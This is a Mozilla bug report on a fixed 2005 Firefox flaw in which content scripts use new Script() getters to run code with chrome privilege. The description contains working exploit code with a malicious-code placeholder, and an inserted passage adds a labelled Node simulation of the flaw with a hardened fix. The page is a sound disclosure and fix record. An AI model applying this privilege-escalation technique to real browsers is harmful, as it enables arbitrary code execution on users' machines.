new Script() can access chrome window and run arbitrary code with chrome privilege

Status: RESOLVED FIXED
Product / Component: Core / Security
Reported: 13 years ago
Last modified: 11 years ago

People

Reporter: moz_bug_r_a4
Assigned: brendan

Tracking

Keywords: fixed-aviary1.0.4, fixed1.7.8
Version: Trunk
Platform: x86, Windows XP
Bug Flags: blocking1.7.8 +, blocking-aviary1.0.4 +, in-testsuite ?
Firefox Tracking Flags: (Not tracked)

Details

Whiteboard: [sg:fix] trunk version rolled into 281988

Attachments

(4 attachments)

(Reporter)

Description

13 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

Firefox 1.0.3:
missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another
event handler that can be used to make chrome access non-DOM JS property
(related to Bug 289961).

Mozilla 1.7.7:
hrefForClickEvent (in contentAreaClick.js) is the function that can be used to
make chrome access non-DOM JS property (related to Bug 290324).

There is a way to circumvent the fix presented in bug 289074 comment 79. The
code in the Script object can access |arguments.callee.__parent__|, which is the
chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome
privilege.

Exploit:

  // The Script body runs when chrome reads the getter. arguments.callee is the
  // Script object itself and its __parent__ is the chrome window; the trailing
  // '' leaves an empty string as the Script's completion value.
  var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';";

  // See the note below: the wrapping function must have an activation object
  // (the inner function x references the non-local identifier Object) or
  // |arguments| is not defined when the Script runs.
  var script = (function() {
    function x() { new Object(); }
    return new Script(scriptCode);
  })();

  // Install the Script object as the getter for the property that chrome's
  // missingPluginInstaller.prototype.newMissingPlugin handler reads, then fire
  // the PluginNotFound event so that chrome performs the read.
  document.body.__defineGetter__("type", script);
  var event = document.createEvent("Events");
  event.initEvent("PluginNotFound", true, true);
  document.body.dispatchEvent(event);

note:
It matters how the Script object is created. A, B, and C cause this error:
"Error: arguments is not defined". I don't know why D can access |arguments|.

A)
  // no wrapping function at all
  var script = new Script(scriptCode);

B)
  // wrapping function, but nothing inside it refers to an outer variable
  var script = (function() {
    return new Script(scriptCode);
  })();

C)
  // inner function present, but it references no non-local identifier
  var script = (function() {
    function x() { "a"; }
    return new Script(scriptCode);
  })();

D)
  // inner function references a non-local identifier (anyObj); see comment 4
  // any Object (window, document, new Array(), ...)
  var anyObj = new Object();
  var script = (function() {
    function x() { anyObj; }
    return new Script(scriptCode);
  })();


I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414


Reproducible: Always

Steps to Reproduce:
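The pattern behind the report, as an added example that is not part of the bug report or of Mozilla's code: a Node-runnable simulation of a trusted handler reading a property off an object the untrusted side controls. It cannot reproduce new Script(), __parent__ or the chrome/content boundary (none of them exist in current engines), so the "privileged" side is just an ordinary function, and the names buildContentTarget, naiveHandler, readDataProperty, hardenedHandler and simulate are mine. What it does show is the half of the bug that still applies today: a plain property read on an attacker-controlled object is a call into attacker code, and a reader that only honours data properties does not make that call.

```javascript
// Added example (not from the bug report). Constructed simulation: there is no
// real privilege boundary here; "privileged" only means "the trusted side".

// Content side: build the event target and plant an accessor on the property
// the privileged handler is known to read (here "type"), the same way the
// report uses __defineGetter__ on document.body.
function buildContentTarget(log) {
  const target = { tagName: "BODY" };
  target.__defineGetter__("type", function () {
    // Whatever is here executes during the privileged side's property read.
    log.push("content getter executed, this.tagName=" + this.tagName);
    return "application/x-evil";
  });
  return target;
}

// Privileged side, naive: a plain property read, as in the vulnerable
// handlers. Reading .type invokes whatever accessor content installed.
function naiveHandler(event) {
  return { type: event.target.type };
}

// Privileged side, hardened: walk the prototype chain with
// getOwnPropertyDescriptor and only accept data properties, so no
// content-defined function runs during the read. Accessor descriptors carry
// "get"/"set" keys; data descriptors carry "value"/"writable".
function readDataProperty(obj, name) {
  for (let o = obj; o !== null; o = Object.getPrototypeOf(o)) {
    const d = Object.getOwnPropertyDescriptor(o, name);
    if (d === undefined) continue;
    if ("get" in d || "set" in d) return undefined; // accessor: do not run it
    return d.value;
  }
  return undefined;
}

function hardenedHandler(event) {
  return { type: readDataProperty(event.target, "type") };
}

// Run one handler against a fresh content-built target and report whether the
// content getter fired and what the handler saw.
function simulate(handler) {
  const log = [];
  const result = handler({ target: buildContentTarget(log) });
  return { type: result.type, getterRan: log.length > 0, log };
}

console.log("naive:", simulate(naiveHandler));
console.log("hardened:", simulate(hardenedHandler));
```

In the real bug the getter's code ran with chrome privilege because the Script was compiled in chrome's scope; here it runs in the same scope as the handler, which is why the simulation only logs the call. The descriptor check is an illustration of the principle, not a privilege boundary on its own: a Proxy can trap getOwnPropertyDescriptor just as easily, so the durable fix is to keep privileged code from touching content-defined JS properties at all, which is what Firefox's later Xray wrappers enforce.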
(Reporter)

Comment 1

13 years ago
Created attachment 181108 [details]
testcase 1

for Firefox/1.0.3
(Reporter)

Comment 2

13 years ago
Created attachment 181110 [details]
testcase 2

for Mozilla/1.7.7
(Reporter)

Comment 3

13 years ago
Created attachment 181111 [details]
testcase 3

each of the ways to create Script object
(Assignee)

Comment 4

13 years ago
Testcase 1 is quite clever.  Another bounty for moz_bug_r_a4!

The patch in bug 290324 stops testcase 2.

Testcase 3 merely shows how to get an outer function invocation to have an
activation (Call in SpiderMonkey) object: nest an inner function that uses a
non-local identifier.

/be
Assignee: dveditz → brendan
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 5

(In reply to comment #4)
> The patch in bug 290324 stops testcase 2.

No, it's the suite version of testcase 1.
(Assignee)

Comment 6

13 years ago
Er, dbaron points out that testcase 2 is for the suite.  It's the suite version
of testcase 1, I guess.

More tomorrow.  Thanks again, moz_bug_r_a4.

/be
Status: NEW → ASSIGNED
Blocks: 256195
Flags: blocking-aviary1.1+
Flags: blocking-aviary1.0.4+
Whiteboard: [sg:fix]
Comment 7

The more JS can interact with chrome, the more exploits.

Especially if chrome executes JS.
(Assignee)

Comment 8

13 years ago
Created attachment 181234 [details] [diff] [review]
fix
Attachment #181234 - Flags: superreview?(dbaron)
Attachment #181234 - Flags: review?(jst)
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval-aviary1.0.4?
(Assignee)

Comment 9

13 years ago
Comment on attachment 181234 [details] [diff] [review]
fix

jst, feel free to review too.

/be
Attachment #181234 - Flags: review?(jst) → review?(shaver)
Comment 10

Comment on attachment 181234 [details] [diff] [review]
fix

r=shaver
Attachment #181234 - Flags: review?(shaver) → review+
(Assignee)

Comment 11

13 years ago
Thanks to bz for some productive discussion, part of which suggested this patch.

/be
Comment 12

Comment on attachment 181234 [details] [diff] [review]
fix

I really don't understand this anymore, but sr=dbaron.
Attachment #181234 - Flags: superreview?(dbaron) → superreview+
Flags: blocking1.8b2+
Flags: blocking1.7.8+
Depends on: 281988
Whiteboard: [sg:fix] → [sg:fix] trunk version rolled into 281988

Updated

13 years ago
Flags: blocking1.8b2+
Flags: blocking-aviary1.1+
(Assignee)

Comment 13

12 years ago
Comment on attachment 181234 [details] [diff] [review]
fix

Got dveditz and drivers approval on IRC.  Checking in, with the same change to
obj_eval (indirect call error).

/be
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval1.7.8+
Attachment #181234 - Flags: approval-aviary1.0.4?
Attachment #181234 - Flags: approval-aviary1.0.4+
(Assignee)

Comment 14

12 years ago
Checked into branches.

/be
Status: ASSIGNED → RESOLVED
Last Resolved: 12 years ago
Resolution: --- → FIXED

Updated

12 years ago
Flags: blocking-aviary1.0.5+ → blocking-aviary1.0.4+

Updated

12 years ago
Attachment #181234 - Flags: approval-aviary1.0.5+ → approval-aviary1.0.4+
Comment 15

Other than the attached test cases, are there other areas or things we could
test to ensure that this didn't regress anything? Thanks!

Comment 16

12 years ago
In Firefox 1.0.4/winxp, I am getting the following for testcase 3:

A)
ReferenceError: arguments is not defined

B)
ReferenceError: arguments is not defined

C)
ReferenceError: arguments is not defined

D)
[object Object]

Was D) supposed to be fixed?
Keywords: fixed-aviary1.0.4, fixed1.7.8
Comment 17

Clearing security flag from announced vulnerabilities fixed in Firefox
1.0.4/Mozilla 1.7.8
Group: security
Blocks: 256197
No longer blocks: 256195

Updated

12 years ago
Flags: testcase+

Updated

11 years ago
Flags: in-testsuite+ → in-testsuite?